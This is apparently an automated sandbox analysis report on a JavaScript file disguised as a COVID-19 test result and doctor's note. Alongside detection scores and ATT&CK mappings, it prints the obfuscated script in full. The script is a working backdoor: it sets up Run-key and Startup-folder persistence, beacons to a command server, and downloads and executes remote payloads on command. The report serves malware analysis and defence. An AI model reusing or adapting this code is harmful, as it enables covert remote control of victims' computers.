Analysis Report COVID_19_Test_Result_Doctor_Note.js
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | Process Stats: |
Source: | Initial sample: |
Source: | Classification label: |
Source: | Key opened: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Data Obfuscation: |
---|
Potential obfuscated javascript found | Show sources |
Source: | Initial file: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion: |
---|
JavaScript source code contains call to eval() to check own source code (likely for evading instrumentation) | Show sources |
Source: | Check function source code vs Regexp: | Go to definition |
Source: | Window found: | Jump to behavior |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Anti Debugging: |
---|
Found potential dummy code loops (likely to delay analysis) | Show sources |
Source: | Process Stats: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Source: | Key value queried: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Path Interception | Virtualization/Sandbox Evasion11 | OS Credential Dumping | Security Software Discovery2 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting22 | LSASS Memory | Virtualization/Sandbox Evasion11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 365159 |
Start date: | 09.03.2021 |
Start time: | 09:12:25 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | COVID_19_Test_Result_Doctor_Note.js |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 27 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal52.evad.winJS@1/0@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
No created / dropped files found |
---|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 5.728503884778436 |
TrID: |
|
File name: | COVID_19_Test_Result_Doctor_Note.js |
File size: | 13478 |
MD5: | 0bca3422ec870f28791d61a4fa25367f |
SHA1: | 36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa |
SHA256: | 7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6 |
SHA512: | bcaeb9faad34f88a8a7392743a8d71eb793eb865f17c3b2232ddb28066a5959e14f476dcffd26901a79e3cf1b8cee05deb96e06d9da6693b7958d1b3915d92d3 |
SSDEEP: | 384:90DjR41HSTJwGFP4NK4lKm5+tbK4vgDDr843x7z/RjozIFY:9ajy1yT1FP4NnlKztbnMDr8uxnRjAIFY |
File Content Preview: | //***ERROR DECODING SIGNATURE FOR PATIENT ***//..//***ERROR OUTPUT***//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','y |
File Icon |
---|
Icon Hash: | e8d69ece968a9ec4 |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 09:13:10 |
Start date: | 09/03/2021 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7deb40000 |
File size: | 163840 bytes |
MD5 hash: | 9A68ADD12EB50DDE7586782C3EB9FF9C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | var _0x39e5 = [ 'mCozt8kWW4eQEG', 'CNvU', 'W53dQmk9cmoWC0Krl3y', 'mZq2odK1DNLpAwXg', 'u2W2ymoJWQCPW5C', 'DgvZDa', 'rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ', 'mty2mZe2u0DUq1z3', 'mJG4odi0q0HOAfbJ', 'ybpdShBdI8o/mdvSWRTG', 'jvrftvaL', 'WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG', 'C2vUza', 'WRhdVmoDc8o3W5zo', 'y2HHCKf0', 'WORcKCkSWORcQSkAmSkB', 'F8kLW40M', 'vxnLCI1bz2vUDa', 'z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L', 'Aw5WDxq', 'CxvPDa', 'cSkTdmoA', 'W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG', 'D3nJCMLWDc5LEguGlY9cia', 'uMvNuMvHza', 'W5xcRHpcMmooWR9jWPWvts8', 'B3bLBG', 'BgvUz3rO', 'WO1dAhxcSW', 'ytL3WP/cK8oHWO12beqi', 'zNjVBunOyxjdB2rL', 'WPKBohVcU8ohW7azW7eXWO0', 'WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS', 'tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm', 'ftRdKq3dNa', 'W4DpyI/dTSow', 'C3rHCNr1Ca', 'otG4mdDgB1b2ueW', 'WO7dVW3dSZtcUq', 'g8ocieBdPCkMWQ17tmkSpG', 'uKvhx1nA', 'y2fSBa', 'hSk6bCobBW', 'cx3dQCkHsZq', 'WRRdVmohomoQW5m', 'WOtdP8klaSo5mSkyoK/dJqi6', 'mteYnJqZt1PHveHh', 'hSkPg8obAWKhW7uItW', 'C2nYAxb0BMfTzq', 'W4PAFctdUW', 'i2iWW4BdLCorWRLXj0m', 'CMvND3jPDgu', 'WOlcRCo0eCoF', 'tvnytuWYlLnLCNzLCLHnteHuvfa', 'Aw5PDa', 'y2HHAw4', 'ywjJzgvMmdeYmZq1nJC4oq', 'W5FcVSorrCo1', 'CMvWBgfJzq', 'ac/dKHu', 'WONdTsTzvCo6jxq', 'oI8V', 'C2nYAxb0zNvSBg5HBwu', 'CMvZCg9UC2vuzxH0', 'q29UDgvUDc1uExbL', 'gNmZW5WpxMj6tG', 'W4NcPW9HDCoalNyWwSodvq', 'W5hdR1G', 'leSr', 'zgvIDq', 'seTdvvXtB2z0D2fYzvXIB2X0xeDvsuq', 'ue9tva', 'jvvtrvjoqu1fjq', 'W4ZdKSoYes/dTCkXWRXTWRGD', 'y29UC3rYDwn0B3i', 'C3bSAxq', 'sSkNW48qWQ/dGmosp8kO', 'muPSufz4sa', 'W6tdI2iVlY8', 'W7btwSoMWPNcICogncecEmk3', 'W6BdGmkmnmoCDeGwnMtcPrxdM8osag7dRGTkW6/cLt0+W5/cIgdcKHK+fx/cRmkFrL3cRwldRtxcLSoGECo3ggxcIrdcUmo4WPtcGG', 'C2f2zxrVzMLSzq', 'WRihhmkcW4JdI8o8cZmIEmkvWO3cRrBdLq', 'yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK', 'oLZdQfSSDW', 'D3nJCMLWDc5ZAgvSBa', 'zMXVB3i', 'WP7cJmk1WOFcQq', 'xNXUkSkbWPmC', 'z2PaW5hcUSkU', 'W6CdlYOiW7XHps3dUmk8W7S' ]; | |
1 | var _0x26ae = function (_0x2929da, _0x18bd1c) { | |
2 | _0x2929da = _0x2929da - 0x136; | |
3 | var _0x387f06 = _0x39e5[_0x2929da]; | |
4 | if ( _0x26ae['wkROjH'] === undefined ) | |
5 | { | |
6 | var _0x2150f9 = function (_0x5a8350) { | |
7 | var _0x494982 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='; | |
8 | var _0x39e5e0 = ''; | |
9 | for ( var _0x26ae68 = 0x0, _0x1fc186, _0x4ab90f, _0x3e72fb = 0x0 ; _0x4ab90f = _0x5a8350['charAt'] ( _0x3e72fb ++ ) ; ~ _0x4ab90f && ( _0x1fc186 = _0x26ae68 % 0x4 ? _0x1fc186 * 0x40 + _0x4ab90f : _0x4ab90f, _0x26ae68 ++ % 0x4 ) ? _0x39e5e0 += String['fromCharCode'] ( 0xff & _0x1fc186 >> ( - 0x2 * _0x26ae68 & 0x6 ) ) : 0x0 ) | |
10 | { | |
11 | _0x4ab90f = _0x494982['indexOf'] ( _0x4ab90f ); | |
12 | } | |
13 | return _0x39e5e0; | |
14 | }; | |
15 | _0x26ae['xYSHEi'] = | |
16 | function (_0x2a30ac) { | |
17 | var _0x2d8802 = _0x2150f9 ( _0x2a30ac ); | |
18 | var _0x40f67c = []; | |
19 | for ( var _0x2d6e36 = 0x0, _0x39a245 = _0x2d8802['length'] ; _0x2d6e36 < _0x39a245 ; _0x2d6e36 ++ ) | |
20 | { | |
21 | _0x40f67c += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x2d6e36 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 ); | |
22 | } | |
23 | return decodeURIComponent ( _0x40f67c ); | |
24 | }, | |
25 | _0x26ae['DaINLR'] = | |
26 | { | |
27 | }, _0x26ae['wkROjH'] = ! ! []; | |
28 | } | |
29 | var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x26ae['DaINLR'][_0x30f503]; | |
30 | if ( _0x38ac6c === undefined ) | |
31 | { | |
32 | var _0x364960 = function (_0x41273d) { |
|
33 | this['FJMtUj'] = _0x41273d, this['PRTrKK'] = [ 0x1, 0x0, 0x0 ], | |
34 | this['lcaTHf'] = | |
35 | function () { | |
36 | return 'newState'; | |
37 | }, this['NiMMBI'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*', this['KKqzjK'] = '[\x27|\x22].+[\x27|\x22];?\x20*}'; | |
38 | }; | |
39 | _0x364960['prototype']['dAYrWi'] = | |
40 | function () { | |
41 | var _0x43f378 = new RegExp ( this['NiMMBI'] + this['KKqzjK'] ), _0x34b6d1 = _0x43f378['test'] ( this['lcaTHf']['toString'] ( ) ) ? -- this['PRTrKK'][0x1] : -- this['PRTrKK'][0x0]; |
|
42 | return this['lLjveu'] ( _0x34b6d1 ); |
|
43 | }, | |
44 | _0x364960['prototype']['lLjveu'] = | |
45 | function (_0x4d31de) { |
|
46 | if ( ! Boolean ( ~ _0x4d31de ) ) |
|
47 | return _0x4d31de; | |
48 | return this['xyNHXg'] ( this['FJMtUj'] ); |
|
49 | }, | |
50 | _0x364960['prototype']['xyNHXg'] = | |
51 | function (_0x553279) { |
|
52 | for ( var _0x3534fb = 0x0, _0x3c82a3 = this['PRTrKK']['length'] ; _0x3534fb < _0x3c82a3 ; _0x3534fb ++ ) | |
53 | { | |
54 | this['PRTrKK']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3c82a3 = this['PRTrKK']['length']; |
|
55 | } | |
56 | return _0x553279 ( this['PRTrKK'][0x0] ); | |
57 | }, new _0x364960 ( _0x26ae ) ['dAYrWi'] ( ), _0x387f06 = _0x26ae['xYSHEi'] ( _0x387f06 ), _0x26ae['DaINLR'][_0x30f503] = _0x387f06; | |
58 | } | |
59 | else | |
60 | _0x387f06 = _0x38ac6c; | |
61 | return _0x387f06; | |
62 | }; | |
63 | var _0x1fc1 = function (_0x2929da, _0x18bd1c) { | |
64 | _0x2929da = _0x2929da - 0x136; | |
65 | var _0x387f06 = _0x39e5[_0x2929da]; | |
66 | if ( _0x1fc1['APyrWQ'] === undefined ) | |
67 | { | |
68 | var _0x2150f9 = function (_0x494982) { | |
69 | var _0x39e5e0 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='; | |
70 | var _0x26ae68 = ''; | |
71 | for ( var _0x1fc186 = 0x0, _0x4ab90f, _0x3e72fb, _0x2a30ac = 0x0 ; _0x3e72fb = _0x494982['charAt'] ( _0x2a30ac ++ ) ; ~ _0x3e72fb && ( _0x4ab90f = _0x1fc186 % 0x4 ? _0x4ab90f * 0x40 + _0x3e72fb : _0x3e72fb, _0x1fc186 ++ % 0x4 ) ? _0x26ae68 += String['fromCharCode'] ( 0xff & _0x4ab90f >> ( - 0x2 * _0x1fc186 & 0x6 ) ) : 0x0 ) | |
72 | { | |
73 | _0x3e72fb = _0x39e5e0['indexOf'] ( _0x3e72fb ); | |
74 | } | |
75 | return _0x26ae68; | |
76 | }; | |
77 | var _0x5a8350 = function (_0x2d8802, _0x40f67c) { | |
78 | var _0x2d6e36 = [], _0x39a245 = 0x0, _0x364960, _0x41273d = '', _0x43f378 = ''; | |
79 | _0x2d8802 = _0x2150f9 ( _0x2d8802 ); | |
80 | for ( var _0x4d31de = 0x0, _0x553279 = _0x2d8802['length'] ; _0x4d31de < _0x553279 ; _0x4d31de ++ ) | |
81 | { | |
82 | _0x43f378 += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x4d31de ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 ); | |
83 | } | |
84 | _0x2d8802 = decodeURIComponent ( _0x43f378 ); | |
85 | var _0x34b6d1; | |
86 | for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ ) | |
87 | { | |
88 | _0x2d6e36[_0x34b6d1] = _0x34b6d1; | |
89 | } | |
90 | for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ ) | |
91 | { | |
92 | _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] + _0x40f67c['charCodeAt'] ( _0x34b6d1 % _0x40f67c['length'] ) ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960; | |
93 | } | |
94 | _0x34b6d1 = 0x0, _0x39a245 = 0x0; | |
95 | for ( var _0x3534fb = 0x0 ; _0x3534fb < _0x2d8802['length'] ; _0x3534fb ++ ) | |
96 | { | |
97 | _0x34b6d1 = ( _0x34b6d1 + 0x1 ) % 0x100, _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960, _0x41273d += String['fromCharCode'] ( _0x2d8802['charCodeAt'] ( _0x3534fb ) ^ _0x2d6e36[( _0x2d6e36[_0x34b6d1] + _0x2d6e36[_0x39a245] ) % 0x100] ); | |
98 | } | |
99 | return _0x41273d; | |
100 | }; | |
101 | _0x1fc1['xeclEU'] = _0x5a8350, | |
102 | _0x1fc1['tEpTFs'] = | |
103 | { | |
104 | }, _0x1fc1['APyrWQ'] = ! ! []; | |
105 | } | |
106 | var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x1fc1['tEpTFs'][_0x30f503]; | |
107 | if ( _0x38ac6c === undefined ) | |
108 | { | |
109 | if ( _0x1fc1['gqdguA'] === undefined ) | |
110 | { | |
111 | var _0x3c82a3 = function (_0x2cc4e4) { | |
112 | this['dFGFPT'] = _0x2cc4e4, this['erFzXo'] = [ 0x1, 0x0, 0x0 ], | |
113 | this['KtfqmL'] = | |
114 | function () { | |
115 | return 'newState'; | |
116 | }, this['zGDTQe'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*', this['HjrHjW'] = '[\x27|\x22].+[\x27|\x22];?\x20*}'; | |
117 | }; | |
118 | _0x3c82a3['prototype']['NiMncb'] = | |
119 | function () { | |
120 | var _0x1ea5df = new RegExp ( this['zGDTQe'] + this['HjrHjW'] ), _0x3d06b9 = _0x1ea5df['test'] ( this['KtfqmL']['toString'] ( ) ) ? -- this['erFzXo'][0x1] : -- this['erFzXo'][0x0]; | |
121 | return this['rKZMXc'] ( _0x3d06b9 ); | |
122 | }, | |
123 | _0x3c82a3['prototype']['rKZMXc'] = | |
124 | function (_0x415288) { | |
125 | if ( ! Boolean ( ~ _0x415288 ) ) | |
126 | return _0x415288; | |
127 | return this['gTYFtX'] ( this['dFGFPT'] ); | |
128 | }, | |
129 | _0x3c82a3['prototype']['gTYFtX'] = | |
130 | function (_0x477ace) { | |
131 | for ( var _0x115c69 = 0x0, _0x3fb45b = this['erFzXo']['length'] ; _0x115c69 < _0x3fb45b ; _0x115c69 ++ ) | |
132 | { | |
133 | this['erFzXo']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3fb45b = this['erFzXo']['length']; | |
134 | } | |
135 | return _0x477ace ( this['erFzXo'][0x0] ); | |
136 | }, new _0x3c82a3 ( _0x1fc1 ) ['NiMncb'] ( ), _0x1fc1['gqdguA'] = ! ! []; | |
137 | } | |
138 | _0x387f06 = _0x1fc1['xeclEU'] ( _0x387f06, _0x18bd1c ), _0x1fc1['tEpTFs'][_0x30f503] = _0x387f06; | |
139 | } | |
140 | else | |
141 | _0x387f06 = _0x38ac6c; | |
142 | return _0x387f06; | |
143 | }; | |
144 | var _0x4f83db = _0x1fc1, _0x5abc4a = _0x26ae; | |
145 | ( function (_0x21ce3b, _0x4d5b36) { |
|
146 | var _0x3ba741 = _0x1fc1, _0x37524d = _0x26ae; | |
147 | while (! ! [ ] ) | |
148 | { | |
149 | try | |
150 | { | |
151 | var _0x469b11 = - parseInt ( _0x37524d ( '0x18d' ) ) + - parseInt ( _0x37524d ( 0x154 ) ) + parseInt ( _0x3ba741 ( 0x189, '01)r' ) ) + - parseInt ( _0x3ba741 ( 0x14e, 'DH)J' ) ) * parseInt ( _0x3ba741 ( 0x18a, '^Bvv' ) ) + - parseInt ( _0x37524d ( 0x15d ) ) * parseInt ( _0x37524d ( '0x17c' ) ) + parseInt ( _0x37524d ( '0x136' ) ) + - parseInt ( _0x3ba741 ( 0x14c, '$G#%' ) ) * - parseInt ( _0x3ba741 ( 0x18e, 'OvA7' ) ); |
|
152 | if ( _0x469b11 === _0x4d5b36 ) | |
153 | break ; | |
154 | else | |
155 | _0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) ); | |
156 | } | |
157 | catch ( _0x4718c2 ) | |
158 | { | |
159 | _0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) ); | |
160 | } | |
161 | } | |
162 | } ( _0x39e5, 0x469ee ) ); | |
163 | var SaveSettings = _0x5abc4a ( 0x175 ), shellobj = new ActiveXObject ( _0x5abc4a ( '0x184' ) ), filesystemobj = new ActiveXObject ( 'scripting.filesystemobject' ), HKCU = _0x4f83db ( 0x17f, '[mYd' ), startup = shellobj[_0x4f83db ( 0x13a, '^EhX' ) ] ( _0x5abc4a ( 0x153 ) ) + '\x5c', installdir = shellobj['expandenvironmentstrings'] ( _0x4f83db ( 0x170, '#LM8' ) ) + '\x5c', temp = shellobj[_0x5abc4a ( 0x190 ) ] ( _0x5abc4a ( '0x139' ) ) + '\x5c', gate = _0x4f83db ( '0x14f', 'v3Qe' ), user_agent = _0x5abc4a ( '0x150' ), time = 0xea60; | |
164 | do | |
165 | { | |
166 | install ( ), getCommand ( ), sleep ( time ); | |
167 | } | |
168 | while( ! ! [ ] ) | |
169 | function Download_exec(_0x4ab90f, _0x3e72fb) { | |
170 | var _0x1071d9 = _0x4f83db, _0xbf514b = _0x5abc4a; | |
171 | if ( _0x4ab90f['indexOf'] ( _0xbf514b ( '0x16c' ) ) < 0x0 ) | |
172 | var _0x2a30ac = gate[_0xbf514b ( '0x17a' ) ] ( '/' ), _0x4ab90f = gate[_0xbf514b ( 0x169 ) ] ( _0x2a30ac[_0x2a30ac['length'] - 0x1], _0x1071d9 ( 0x188, '9fc#' ) + _0x4ab90f ); | |
173 | var _0x2d8802 = new ActiveXObject ( 'Microsoft.XMLHTTP' ), _0x40f67c = new ActiveXObject ( 'ADODB.Stream' ); | |
174 | if ( _0x3e72fb == 0x1 ) | |
175 | var _0x2d6e36 = WSH[_0xbf514b ( 0x16d ) ]; | |
176 | else | |
177 | { | |
178 | var _0x39a245 = _0x4ab90f[_0x1071d9 ( '0x155', 'C^uH' ) ] ( _0x4ab90f[_0x1071d9 ( '0x15b', 'tSe#' ) ] - 0x4, _0x4ab90f[_0xbf514b ( '0x14a' ) ] ), _0x364960 = '', _0x41273d = _0xbf514b ( '0x167' ), _0x43f378 = _0x41273d[_0xbf514b ( 0x14a ) ]; | |
179 | for ( var _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x8 ; _0x34b6d1 ++ ) | |
180 | { | |
181 | _0x364960 += _0x41273d[_0xbf514b ( 0x13d ) ] ( Math[_0xbf514b ( 0x185 ) ] ( Math[_0x1071d9 ( '0x17d', '874s' ) ] ( ) * _0x43f378 ) ); | |
182 | } | |
183 | var _0x2d6e36 = temp + _0x364960 + _0x39a245; | |
184 | } | |
185 | _0x2d8802[_0xbf514b ( 0x149 ) ] ( _0x1071d9 ( 0x172, '874s' ), _0x4ab90f, ! [] ), _0x2d8802[_0xbf514b ( '0x13b' ) ] ( ), _0x40f67c['type'] = 0x1, _0x40f67c[_0xbf514b ( '0x149' ) ], _0x40f67c[_0x1071d9 ( 0x186, '^EhX' ) ] ( _0x2d8802[_0x1071d9 ( 0x171, 'vnI1' ) ] ), _0x40f67c[_0xbf514b ( '0x180' ) ] ( _0x2d6e36, 0x2 ); | |
186 | try | |
187 | { | |
188 | shellobj[_0xbf514b ( '0x18b' ) ] ( _0x2d6e36 ); | |
189 | } | |
190 | catch ( _0x4d31de ) | |
191 | { | |
192 | } | |
193 | } | |
194 | function install() { | |
195 | var _0x2ca4f5 = _0x4f83db, _0x22499d = _0x5abc4a, _0x553279 = _0x22499d ( 0x146 ); | |
196 | try | |
197 | { | |
198 | shellobj[_0x22499d ( 0x162 ) ] ( HKCU + WSH[_0x22499d ( '0x15f' ) ][_0x2ca4f5 ( 0x159, 'ySE2' ) ] ( '.' ) [0x0], _0x553279 + String[_0x22499d ( 0x14d ) ] ( 0x22 ) + installdir + WSH[_0x2ca4f5 ( 0x18c, '[mYd' ) ] + String['fromCharCode'] ( 0x22 ), _0x22499d ( 0x157 ) ), filesystemobj[_0x2ca4f5 ( 0x13e, '^EhX' ) ] ( WSH['scriptfullname'], installdir + WSH[_0x22499d ( 0x15f ) ], ! ! [] ), filesystemobj['copyfile'] ( WSH[_0x22499d ( '0x16d' ) ], startup + WSH[_0x2ca4f5 ( 0x15e, 'ySE2' ) ], ! ! [] ); | |
199 | } | |
200 | catch ( _0x3534fb ) | |
201 | { | |
202 | } | |
203 | } | |
204 | function getCommand() { | |
205 | var _0x373146 = _0x4f83db, _0x22eae4 = _0x5abc4a, | |
206 | _0x3c82a3 = function () { | |
207 | var _0x4e8d66 = ! ! []; | |
208 | return function (_0xd91065, _0x49581c) { | |
209 | var _0x6890f8 = _0x4e8d66 ? | |
210 | function () { | |
211 | var _0x31a666 = _0x1fc1; | |
212 | if ( _0x49581c ) | |
213 | { | |
214 | var _0x2c2df6 = _0x49581c[_0x31a666 ( 0x160, 'DH)J' ) ] ( _0xd91065, arguments ); | |
215 | return _0x49581c = null, _0x2c2df6; | |
216 | } | |
217 | } : | |
218 | function () { | |
219 | }; | |
220 | return _0x4e8d66 = ! [], _0x6890f8; | |
221 | }; | |
222 | } ( ), | |
223 | _0x2cc4e4 = _0x3c82a3 ( this, | |
224 | function () { | |
225 | var _0x165709 = function () { | |
226 | var _0x4e308a = _0x1fc1, _0x50e1a3 = _0x26ae, _0x4f1543 = _0x165709[_0x50e1a3 ( '0x179' ) ] ( 'return\x20/\x22\x20+\x20this\x20+\x20\x22/' ) ( ) [_0x4e308a ( '0x148', 'Fq[d' ) ] ( _0x4e308a ( 0x145, 'hIr#' ) ); | |
227 | return ! _0x4f1543[_0x4e308a ( '0x16a', '2kiA' ) ] ( _0x2cc4e4 ); | |
228 | }; | |
229 | return _0x165709 ( ); | |
230 | } ) ; | |
231 | _0x2cc4e4 ( ); | |
232 | var _0x1ea5df = function () { | |
233 | var _0x14436f = ! ! []; | |
234 | return function (_0x5126a2, _0xc5637) { | |
235 | var _0xe720db = _0x14436f ? | |
236 | function () { | |
237 | if ( _0xc5637 ) | |
238 | { | |
239 | var _0x3e456b = _0xc5637['apply'] ( _0x5126a2, arguments ); | |
240 | return _0xc5637 = null, _0x3e456b; | |
241 | } | |
242 | } : | |
243 | function () { | |
244 | }; | |
245 | return _0x14436f = ! [], _0xe720db; | |
246 | }; | |
247 | } ( ); | |
248 | ( function () { | |
249 | _0x1ea5df ( this, | |
250 | function () { | |
251 | var _0x5b1a0b = _0x26ae, _0x5f0503 = _0x1fc1, _0x522cd6 = new RegExp ( _0x5f0503 ( '0x141', '9fc#' ) ), _0x82cad1 = new RegExp ( '\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)', 'i' ), _0x4ff68c = _0x2150f9 ( _0x5b1a0b ( 0x165 ) ); | |
252 | ! _0x522cd6['test'] ( _0x4ff68c + _0x5b1a0b ( '0x166' ) ) || ! _0x82cad1[_0x5b1a0b ( 0x18f ) ] ( _0x4ff68c + _0x5b1a0b ( '0x142' ) ) ? _0x4ff68c ( '0' ) : _0x2150f9 ( ); | |
253 | } ) ( ); | |
254 | } ( ) ); | |
255 | try | |
256 | { | |
257 | var _0x3d06b9 = shellobj[_0x22eae4 ( '0x147' ) ] ( SaveSettings ); | |
258 | } | |
259 | catch ( _0xcb3062 ) | |
260 | { | |
261 | var _0x3d06b9 = ''; | |
262 | } | |
263 | var _0x415288 = new ActiveXObject ( _0x22eae4 ( '0x164' ) ); | |
264 | _0x415288[_0x22eae4 ( '0x149' ) ] ( _0x22eae4 ( 0x176 ), gate, ! [] ), _0x415288['setRequestHeader'] ( _0x22eae4 ( 0x140 ), user_agent ), _0x415288[_0x373146 ( '0x181', ')q)E' ) ] ( _0x22eae4 ( '0x16f' ), _0x22eae4 ( 0x182 ) ); | |
265 | if ( _0x3d06b9[_0x373146 ( '0x152', 'DH)J' ) ] < 0x8 ) | |
266 | var _0x477ace = _0x373146 ( '0x14b', 'DH)J' ); | |
267 | else | |
268 | var _0x477ace = ''; | |
269 | _0x415288[_0x22eae4 ( '0x13b' ) ] ( _0x373146 ( '0x168', '9]ID' ) + shellobj[_0x22eae4 ( '0x190' ) ] ( _0x22eae4 ( 0x177 ) ) + '|' + _0x3d06b9 + _0x373146 ( 0x173, '$G#%' ) + _0x477ace ); | |
270 | var _0x115c69 = _0x415288[_0x22eae4 ( '0x16e' ) ], _0x3fb45b = _0x115c69[_0x22eae4 ( '0x17a' ) ] ( '|' ); | |
271 | switch ( _0x3fb45b[0x0] ) { | |
272 | case '00' : | |
273 | shellobj['RegWrite'] ( SaveSettings, _0x3fb45b[0x1], _0x22eae4 ( '0x157' ) ); | |
274 | break ; | |
275 | case '01' : | |
276 | Download_exec ( _0x3fb45b[0x1], 0x0 ); | |
277 | break ; | |
278 | case '03' : | |
279 | Download_exec ( _0x3fb45b[0x1], 0x1 ); | |
280 | break ; | |
281 | case '19' : | |
